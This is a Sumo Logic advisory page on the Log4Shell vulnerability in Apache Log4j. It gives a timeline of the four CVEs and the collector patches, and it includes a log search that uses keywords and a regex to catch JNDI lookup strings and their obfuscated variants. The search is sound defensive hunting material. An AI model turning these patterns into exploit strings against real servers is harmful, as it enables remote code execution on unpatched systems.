Was Sumo Logic exploited or the service impacted?
For the initial Log4Shell vulnerability through the two subsequent CVEs, our security and engineering teams have confirmed Sumo Logic was NOT exploited and our Sumo Logic Service was never impacted.
Welcome to Sumo Logic’s content hub for the Log4Shell vulnerability with Apache Log4j. This is our official source of communication and updates for this ongoing and developing issue.
For the initial Log4Shell vulnerability through the two subsequent CVEs, our security and engineering teams have confirmed Sumo Logic was NOT exploited and our Sumo Logic Service was never impacted.
We recommend all customers upgrade their Installed Collectors to this latest version (19.375-4) immediately.
For queries and a deeper technical dive on hunting for this activity, check out our Log4Shell CVE-2021-44228 Situational Awareness Brief.
If you’re using Apache Log4j logging services in your organization, please compare your version against this Apache source for details on updating to the latest version to address the recent security vulnerabilities.
Our Content team is actively working on developing dashboards/searches for customers to leverage to help identify potential cases of compromise within their environment.
Using your Sumo Logic platform, here is a common search that you can use to find current versions of the exploit that bad actors may be attempting to abuse, which may help you identify cases in your own environment:
("jndi:" or "{lower:j" or "{upper:j" or "-j}" or ":-j%7") | parse regex "(?<jndi_string>\$\{(?:\$\{[^\}])?j\}?(?:\$\{[^\}])?n\}?(?:\$\{[^\}])?d\}?(?:\$\{[^\}])?i.*?:}?[^,;\"\\]+}?)[\\\";,]" nodrop
For a deeper technical dive on hunting for this activity, check out our Log4Shell CVE-2021-44228 Situational Awareness Brief.
Beginning early in the morning on Dec. 10th, Sumo Logic’s security team investigated and validated the nature and severity of the exploit against potential points of compromise and determined that at NO time was Sumo Logic exploited.
We use a custom SumoLog4Layout library that never invokes custom lookups (as compared to Apache Log4j) so the Sumo Logic Service was never impacted.
Sumo Logic’s Installed Collector is designed to not invoke anything that it is receiving on the internet. Further, the logging that we do use Log4j for in our collector is for internal audit purposes only—so this never posed any significant risk. As a precaution, we released an updated Installed Collector on Dec. 11th with Log4j v2.15.0 in case the situation escalated. With the discovery of CVE-2021-45046, we updated our collector on Dec. 16th with Log4j v2.16.0. With the discovery of CVE-2021-45105, we updated our collector on Dec. 19th with Log4j v2.17.0. On Dec. 29th we updated our collector with Log4j v2.17.1 to proactively protect against CVE-2021-44832.
Sumo Logic remains in constant communication with our customers.
Sumo Logic’s System Security and Global Operations Center teams continue to monitor this situation closely for any change in the nature of the vulnerability, methods of compromise, and detection bypass methods.
On Dec. 29th we published a new version of our Installed Collector, release 19.375-4, which has been updated to leverage Log4j v2.17.1 and address the vulnerability related to CVE-2021-44832. We recommend all customers upgrade their Installed Collectors to this latest version immediately.
Please stay up to date with our latest releases to ensure any potential undiscovered or undisclosed issues in prior Log4j versions are not exploitable.
Sumo Logic’s Customer Support team is following up directly with customers on known vulnerable versions to ensure all customers get to a secure/safe version as soon as possible.
If you have any questions, please contact us at support@sumologic.com
Dynamic, scalable, secure platform
We analyze more than an exabyte of data and one quadrillion records daily for over 2,300 enterprises around the world.
Multi-tenant architecture
Built for rapid deployment with consistent, continuously updated software and balanced resources across all customers.
Built-in security from the ground up
Protect your users' data with best-in-class security technologies, rigorous security process, and daily rotated, per-customer encryption keys.
Built with security-first principle in and for the cloud
SOC 2 Type 2, PCI DSS 3.2.1, CSA Star, FedRAMP® Moderate and HIPAA certifications.
Insightful analytics
Identify and predict anomalies in real-time with outlier detection and uncover root-causes using our patented LogReduce® and LogCompare pattern analyses.
Powerful and intuitive query-based analytics
Unshackle power users with a rich operator library and enable all users with easy to use search templates.
Yes, we highly recommend you update your Sumo Logic Installed Collector. Sumo Logic’s Installed Collector is designed to not invoke anything that it is receiving on the internet. Further, the logging that we do use Log4j for in our collector is for internal audit purposes only—so these vulnerabilities never posed any significant risk. As a precaution, we’ve released four updates (as of 12/29/2021) to our Installed Collector to support patches and updates the Apache Software Foundation has made to their Log4j code.
Log4Shell is a critical (CVSS severity of 10) zero-day vulnerability in Apache Log4j, an open-source Java-based logging tool.
Apache Log4j is the logging tool that’s had (as of this writing) four different vulnerabilities associated with it. The first vulnerability (CVE-2021-44228) garnered the name “Log4Shell” by many in the security community, however, the three subsequent vulnerabilities reported by CVE and the National Vulnerability Database have not been given a nickname at this time.
Hackers can leverage the initial vulnerability (CVE-2021-44228) to send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 and higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control. This is a RCE (remote code execution) attack.
Later the security community learned the Log4Shell vulnerability fix still left Log4j open to attackers. This second vulnerability (CVE-2021-45046) allows threat actors to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DoS) attack. The Apache Software Foundation mitigated this vector by completely removing message lookups feature with their Log4j v2.16.0. Sumo Logic proactively released an Installed Collector with v2.16.0 on Dec. 16th, 2021.
On Dec. 18th, the NVD published a 3rd vulnerability (CVE-2021-45105) since the Log4j v2.16.0 didn’t protect from uncontrolled recursion from self-referential lookups, allowing an attacker to cause a DoS. Sumo Logic proactively released an Installed Collector with v2.17.0 on Dec. 19th, 2021.
On Dec. 28th, the NVD published a 4th vulnerability (CVE-2021-44832) as Log4j v2.17.0 was vulnerable to an RCE attack if an attacker has control of the target LDAP server. Sumo Logic proactively released an Installed Collector with Log4j v2.17.1 on Dec. 29th, 2021.
Any server or device that uses an unpatched version of Apache Log4j is vulnerable, which is estimated at 3 billion devices at the time of the vulnerability disclosure.
Sumo Logic and other security experts provide additional insights and guidance on the Log4Shell vulnerability and how our Sumo Logic platform can help
George Gerchow and Roland Palmer discuss the facts on Log4Shell vulnerability and how organizations should respond.
Sumo Logic’s SpecOps team provides an overview and offers recommendations on hunting for and patching against the Log4Shell vulnerability.
Read blogLatest release notes for Sumo Logic’s Installed Collector with links to instructions for upgrade options.
See notesCheck out this live dashboard our friends at Mjolnir Security built using Sumo Logic’s platform to track Log4j exploit activities.
Track exploits
We understand this is likely an extremely stressful time for you and your security team. If you’re a Sumo Logic customer, we want to assure you that our account team is standing by and ready to help. For any additional technical questions or concerns, please open a case with Sumo Logic Support by contacting them via email, or submitting your request.
If you’re not yet a Sumo Logic customer but would like to gain a better understanding of how we’re helping organizations navigate this and future challenges, please request your own free trial.